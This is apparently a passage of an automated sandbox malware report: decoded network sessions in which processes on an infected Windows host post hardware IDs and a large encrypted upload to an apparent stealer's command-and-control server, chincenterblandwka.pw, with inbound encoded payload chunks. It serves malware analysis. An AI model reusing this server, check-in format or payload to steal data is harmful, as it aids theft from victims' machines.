2023-12-27 16:58:04 UTC	1369	IN	Data Raw: 37 69 65 6a 30 59 34 6c 38 41 56 39 2f 4b 78 5a 39 32 6c 69 46 6c 58 4a 6f 46 53 76 4a 34 61 52 34 50 4d 72 32 51 4d 57 57 32 47 2f 41 72 72 77 74 34 42 64 4f 48 44 46 75 58 7a 53 54 46 73 71 61 61 69 42 44 62 49 72 44 70 58 30 74 33 37 4d 76 71 74 79 56 49 59 6e 71 76 6e 7a 42 45 47 51 63 4d 57 35 66 4e 4a 4e 4e 35 66 55 77 49 6c 6c 73 69 4b 33 73 4f 33 76 44 2f 77 43 61 33 4a 64 67 7a 36 6a 39 59 34 64 74 44 45 78 33 4c 78 74 34 32 46 75 41 6b 6e 4e 75 45 53 66 4e 36 4b 4e 2f 4e 4d 66 38 51 63 61 51 31 69 4f 46 78 35 51 68 7a 54 31 4f 48 44 46 75 58 7a 62 57 54 4d 72 46 4d 43 41 30 4c 64 7a 6c 37 68 5a 54 68 72 45 43 67 4e 79 56 66 49 58 48 6c 43 48 4e 50 55 34 63 4d 54 56 79 48 70 4d 57 79 4e 38 77 49 6c 6c 73 69 75 69 69 4f 57 4f 47 73 30 72 4f 6d 74 Data Ascii: 7iej0Y4l8AV9/KxZ92liFlXJoFSvJ4aR4PMr2QMWW2G/Arrwt4BdOHDFuXzSTFsqaaiBDbIrDpX0t37MvqtyVIYnqvnzBEGQcMW5fNJNN5fUwIllsiK3sO3vD/wCa3Jdgz6j9Y4dtDEx3Lxt42FuAknNuESfN6KN/NMf8QcaQ1iOFx5QhzT1OHDFuXzbWTMrFMCA0Ldzl7hZThrECgNyVfIXHlCHNPU4cMTVyHpMWyN8wIllsiuiiOWOGs0rOmt
2023-12-27 16:58:04 UTC	1369	IN	Data Raw: 76 69 48 4e 50 55 34 65 64 43 42 64 4c 70 4d 55 68 70 35 2b 61 42 51 6f 77 2b 4f 6b 63 44 44 49 2b 45 54 4f 6c 39 4a 6c 79 71 33 35 59 6f 74 7a 42 6c 68 77 4c 78 4a 35 33 6c 7a 4b 30 78 30 49 57 57 79 49 72 65 77 37 65 59 61 7a 52 39 72 65 6a 79 47 4c 6a 65 74 6f 67 58 6c 4d 4d 52 74 75 58 7a 53 54 46 73 69 43 50 41 39 7a 62 49 69 74 37 44 74 35 33 5a 77 6f 67 4e 79 56 49 59 6e 71 76 69 48 50 65 41 41 65 4b 32 35 64 65 74 68 53 6a 4a 68 2b 59 52 30 6d 7a 2b 65 71 65 44 33 43 38 45 2f 47 6d 39 5a 73 7a 36 54 79 61 59 35 2b 41 46 56 38 4a 78 67 32 6e 7a 76 69 33 7a 41 69 57 57 79 49 72 65 77 35 50 4e 79 7a 47 49 44 65 35 6d 44 64 76 2b 78 76 7a 78 42 6b 48 44 46 75 58 7a 53 54 53 38 54 79 47 69 4a 5a 62 49 69 74 37 47 42 55 72 4c 45 43 67 4e 79 56 49 59 6e Data Ascii: viHNPU4edCBdLpMUhp5+aBQow+OkcDDI+ETOl9Jlyq35YotzBlhwLxJ53lzK0x0IWWyIrew7eYazR9rejyGLjetogXlMMRtuXzSTFsiCPA9zbIit7Dt53ZwogNyVIYnqviHPeAAeK25dethSjJh+YR0mz+eqeD3C8E/Gm9Zsz6TyaY5+AFV8Jxg2nzvi3zAiWWyIrew5PNyzGIDe5mDdv+xvzxBkHDFuXzSTS8TyGiJZbIit7GBUrLECgNyVIYn
2023-12-27 16:58:04 UTC	1369	IN	Data Raw: 48 55 42 55 47 45 6f 47 33 33 53 57 6f 4b 59 65 6d 51 52 49 38 58 6b 70 48 41 7a 78 50 78 46 79 70 58 52 62 63 71 75 38 47 37 50 4d 57 4d 32 4d 57 35 66 4e 4a 4d 57 79 4e 38 79 5a 77 4e 75 6b 71 33 75 58 69 48 4a 39 56 66 54 71 39 42 6a 6d 75 69 54 43 38 30 39 54 68 77 78 62 67 49 34 75 6a 76 69 39 6a 41 69 41 6b 47 69 72 65 77 37 65 59 61 78 41 6f 44 65 30 47 2b 4c 38 4c 34 6a 69 33 55 4d 55 33 6b 6e 45 6e 58 57 57 6f 71 51 65 48 49 54 4c 73 72 68 71 48 67 33 77 66 4a 4d 77 59 7a 62 5a 63 61 75 39 48 48 50 4d 57 4d 32 4d 57 35 66 4e 4a 4d 57 79 4e 38 79 5a 77 4e 75 6b 71 33 75 57 54 44 49 38 45 7a 44 6d 65 4a 67 78 61 62 37 64 63 38 51 5a 42 77 78 62 6c 38 30 6b 30 76 45 39 68 30 49 63 47 79 49 39 73 45 52 65 59 61 78 41 6f 44 63 6c 53 47 4c 72 2f 41 6a Data Ascii: HUBUGEoG33SWoKYemQRI8XkpHAzxPxFypXRbcqu8G7PMWM2MW5fNJMWyN8yZwNukq3uXiHJ9VfTq9BjmuiTC809ThwxbgI4ujvi9jAiAkGirew7eYaxAoDe0G+L8L4ji3UMU3knEnXWWoqQeHITLsrhqHg3wfJMwYzbZcau9HHPMWM2MW5fNJMWyN8yZwNukq3uWTDI8EzDmeJgxab7dc8QZBwxbl80k0vE9h0IcGyI9sEReYaxAoDclSGLr/Aj
2023-12-27 16:58:04 UTC	1369	IN	Data Raw: 77 78 62 6c 39 70 6e 7a 76 69 33 7a 41 69 57 57 79 49 39 73 45 52 65 59 61 78 41 6f 44 63 6c 53 47 4c 72 2f 41 6a 31 7a 31 4d 58 33 38 6a 48 6e 6e 53 56 34 75 58 59 48 49 58 4a 38 4c 71 6f 6e 49 31 77 75 46 47 7a 5a 66 55 59 4d 4b 76 39 47 2b 46 66 41 73 65 50 55 4e 31 4e 4a 4d 57 79 4e 38 77 49 6c 6c 75 7a 66 66 75 49 58 6d 45 30 46 66 53 6b 35 63 4d 6f 2b 71 2b 49 63 30 39 54 6b 45 39 51 33 55 30 6b 78 62 49 33 7a 42 35 64 45 61 49 72 65 77 37 65 59 61 78 41 6f 4b 5a 32 79 4f 54 36 72 78 72 67 6e 63 47 57 6e 51 68 47 6e 44 59 52 6f 4f 59 66 47 41 66 4a 63 58 70 71 6e 6f 37 31 76 56 45 79 70 33 61 62 73 57 72 2b 43 50 42 45 47 51 63 4d 57 35 66 4e 4a 4d 57 79 4e 31 31 65 46 74 32 69 4b 2b 63 64 44 58 66 2f 45 66 54 6c 4a 63 4d 6f 2b 71 2b 49 63 30 39 54 Data Ascii: wxbl9pnzvi3zAiWWyI9sEReYaxAoDclSGLr/Aj1z1MX38jHnnSV4uXYHIXJ8LqonI1wuFGzZfUYMKv9G+FfAsePUN1NJMWyN8wIlluzffuIXmE0FfSk5cMo+q+Ic09TkE9Q3U0kxbI3zB5dEaIrew7eYaxAoKZ2yOT6rxrgncGWnQhGnDYRoOYfGAfJcXpqno71vVEyp3absWr+CPBEGQcMW5fNJMWyN11eFt2iK+cdDXf/EfTlJcMo+q+Ic09T
2023-12-27 16:58:04 UTC	1369	IN	Data Raw: 78 64 63 42 65 79 4c 70 6f 64 68 77 69 32 2b 53 6a 64 58 75 72 6d 77 4b 41 33 4a 55 68 69 62 65 79 44 4f 63 39 54 68 77 78 62 6c 39 76 76 6a 7a 49 33 7a 41 69 57 57 79 49 72 65 35 2b 4e 34 53 72 41 6f 4b 65 31 6d 37 5a 72 66 31 70 68 58 49 45 55 58 59 70 45 6e 4c 56 58 34 53 50 66 47 38 62 4b 4d 48 75 71 33 6f 77 7a 76 31 4a 30 4e 36 5a 44 4b 50 71 76 69 48 4e 50 55 34 63 4d 57 77 61 62 70 45 4d 79 4e 31 59 65 78 6f 6a 78 71 32 41 63 69 33 44 73 57 48 4d 6c 64 42 76 33 65 69 54 43 38 30 39 54 68 77 78 62 67 49 34 76 6a 7a 49 33 7a 41 69 57 57 7a 54 67 4d 59 37 65 59 61 78 41 6f 44 63 6c 53 50 4d 70 4c 77 37 7a 54 38 46 55 48 38 76 47 6e 37 5a 55 59 71 57 63 6d 38 52 49 4d 33 39 70 48 55 78 31 76 78 44 7a 35 72 61 61 63 36 68 37 6d 61 47 65 55 77 51 48 45 Data Ascii: xdcBeyLpodhwi2+SjdXurmwKA3JUhibeyDOc9Thwxbl9vvjzI3zAiWWyIre5+N4SrAoKe1m7Zrf1phXIEUXYpEnLVX4SPfG8bKMHuq3owzv1J0N6ZDKPqviHNPU4cMWwabpEMyN1Yexojxq2Aci3DsWHMldBv3eiTC809ThwxbgI4vjzI3zAiWWzTgMY7eYaxAoDclSPMpLw7zT8FUH8vGn7ZUYqWcm8RIM39pHUx1vxDz5raac6h7maGeUwQHE
2023-12-27 16:58:04 UTC	1369	IN	Data Raw: 55 34 32 57 59 47 73 4a 4a 63 4c 73 6f 48 45 79 78 50 31 41 77 35 50 58 49 34 58 48 6c 43 48 4e 50 55 34 63 4d 57 35 66 4e 74 5a 4d 79 73 55 77 49 44 34 4e 33 66 6d 6b 4f 78 6a 54 35 55 72 46 6b 73 46 6f 79 71 76 71 62 70 38 2f 59 7a 59 78 62 6c 38 30 6b 78 61 56 30 78 30 49 57 57 79 49 72 65 77 37 49 71 75 62 41 6f 44 63 6c 53 47 4a 36 72 34 6a 69 48 4e 4d 42 6a 46 73 46 6e 6e 66 57 59 47 5a 65 32 55 54 4c 63 2f 71 70 48 55 33 78 66 74 4a 79 4a 76 53 5a 63 47 72 38 6d 79 4f 63 77 68 58 66 53 56 64 4f 4c 34 38 79 4e 38 77 49 6c 6c 73 69 4b 33 75 66 69 4f 45 71 77 4b 43 71 4d 64 6b 30 36 58 73 49 62 31 38 48 55 39 6d 49 51 31 77 6b 33 75 4a 6b 58 46 6c 48 44 36 4b 67 4d 59 37 65 59 61 78 41 6f 43 42 6d 51 79 6a 36 72 34 68 7a 54 31 4f 52 78 78 45 58 7a 53 Data Ascii: U42WYGsJJcLsoHEyxP1Aw5PXI4XHlCHNPU4cMW5fNtZMysUwID4N3fmkOxjT5UrFksFoyqvqbp8/YzYxbl80kxaV0x0IWWyIrew7IqubAoDclSGJ6r4jiHNMBjFsFnnfWYGZe2UTLc/qpHU3xftJyJvSZcGr8myOcwhXfSVdOL48yN8wIllsiK3ufiOEqwKCqMdk06XsIb18HU9mIQ1wk3uJkXFlHD6KgMY7eYaxAoCBmQyj6r4hzT1ORxxEXzS
2023-12-27 16:58:04 UTC	1369	IN	Data Raw: 54 42 4f 45 44 72 4e 72 2b 41 57 55 34 61 78 41 6f 44 63 6c 53 47 4a 36 50 4d 6a 31 7a 30 31 48 6a 74 73 49 6a 69 2b 50 4d 6a 66 4d 43 4a 5a 62 49 69 74 37 6d 46 37 6e 4c 45 41 39 35 33 5a 62 63 79 2b 37 53 36 68 65 41 70 62 64 44 78 66 57 4e 70 41 6a 64 30 38 44 33 4e 73 69 4b 33 73 4f 33 6d 47 73 51 44 45 33 6f 38 68 6d 2b 61 54 43 38 30 39 54 68 77 78 62 6c 38 30 6b 56 43 62 33 53 6f 69 53 33 79 52 75 76 30 75 61 35 61 63 4b 49 44 63 6c 53 47 4a 36 75 4d 74 34 42 64 4f 48 44 46 75 58 7a 54 49 4f 2b 4c 66 4d 43 4a 5a 62 49 69 74 37 44 6b 74 68 4b 73 43 6b 4e 43 34 43 34 6e 71 76 69 48 4e 50 55 34 63 4d 7a 35 64 4c 70 4d 55 7a 5a 35 67 63 68 30 74 33 4f 7a 70 52 77 58 48 35 55 33 4e 6c 64 5a 64 39 59 62 78 59 6f 78 78 54 6d 39 6c 49 51 31 31 31 46 4f 30 Data Ascii: TBOEDrNr+AWU4axAoDclSGJ6PMj1z01HjtsIji+PMjfMCJZbIit7mF7nLEA953Zbcy+7S6heApbdDxfWNpAjd08D3NsiK3sO3mGsQDE3o8hm+aTC809Thwxbl80kVCb3SoiS3yRuv0ua5acKIDclSGJ6uMt4BdOHDFuXzTIO+LfMCJZbIit7DkthKsCkNC4C4nqviHNPU4cMz5dLpMUzZ5gch0t3OzpRwXH5U3NldZd9YbxYoxxTm9lIQ111FO0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49791	172.67.176.11	443	564	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:04 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 640 Host: chincenterblandwka.pw
2023-12-27 16:58:04 UTC	640	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
2023-12-27 16:58:05 UTC	1333	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o6gs45ltamvicho54c545003m2; expires=Sun, 21-Apr-2024 10:44:44 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YS1ohnkSBUfLZntyYa8ap7KbUQ%2FpDiDMyfJIqS6%2BkL%2FRhHOIp4PFzJkPoyxXgXdlda%2BY6dT75hlVn8W87mcZQ7HamiQjKbNUEqbl7RkcCHGMA%2B7Uf7ZnPbGH5UIbl283T09sH%2FmKjLQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b343a666c5b-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:05 UTC	28	IN	Data Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a Data Ascii: 16Debug data is disabled
2023-12-27 16:58:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49794	172.67.176.11	443	564	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:05 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 643 Host: chincenterblandwka.pw
2023-12-27 16:58:05 UTC	643	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
2023-12-27 16:58:06 UTC	1327	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5rn4hfcnrtjb3dtlcoorh445ea; expires=Sun, 21-Apr-2024 10:44:44 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TjtQNJlywuERs0P%2F7h0EZnV1Z7weAKCLnGa2BaU%2FGqbWyRPrusNueSrjCPK33T1hiZWxztrTh7kNVtyE%2B8oTwxkcovdnlUYfq3io5nDUyexHR97cel4LQCZ10t8nfaOzdDXC1zwePyc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b39ecf26b1c-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:06 UTC	28	IN	Data Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a Data Ascii: 16Debug data is disabled
2023-12-27 16:58:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49795	172.67.176.11	443	7832	C:\Users\user\AppData\Local\Temp\ABF7.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:05 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 632 Host: chincenterblandwka.pw
2023-12-27 16:58:05 UTC	632	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 76 42 76 56 39 2d 2d 57 61 6c 6c 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HvBvV9--Walle
2023-12-27 16:58:06 UTC	1329	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n70kqs3h2agrdihevbvq1dkjij; expires=Sun, 21-Apr-2024 10:44:45 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IOksQg3KNE0%2Fo%2Fhx6V3eiMgFuBDimf05%2FAH%2Fty8bdmyMu1CSFhPlIF8zUDEa6qz2GICjAwUPQVt7DorLnRpUvZ8ykzhP96IJMEkYaxsLWDQrEza6DcAPTwjnHILMG2wtVHvnvVMEaTE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b3a0fa9e7d3-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:06 UTC	28	IN	Data Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a Data Ascii: 16Debug data is disabled
2023-12-27 16:58:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49801	172.67.176.11	443	7832	C:\Users\user\AppData\Local\Temp\ABF7.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:07 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19502 Host: chincenterblandwka.pw
2023-12-27 16:58:07 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 76 42 76 56 39 2d 2d 57 61 6c 6c 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HvBvV9--Walle
2023-12-27 16:58:07 UTC	4171	OUT	Data Raw: dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd Data Ascii: ~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3R
2023-12-27 16:58:08 UTC	1325	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t19uf9eb3doetnffaa3apiu1ln; expires=Sun, 21-Apr-2024 10:44:47 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:08 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:08 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:08 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GEaxhuRO2tJyjeTAsUO4Bq4QcIXxqB06oyDlUNqlYSg2UPrMAVuwRDZ%2FDsp1L%2FDJDldZUH1yyUu4rdqfMaQf0n74jKWP7eEGs3lVXR0PecS4N1E7YUmsNOoYvHOrkvX862knFZv6vvE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b4608da4790-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: fok 212.102.41.2
2023-12-27 16:58:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
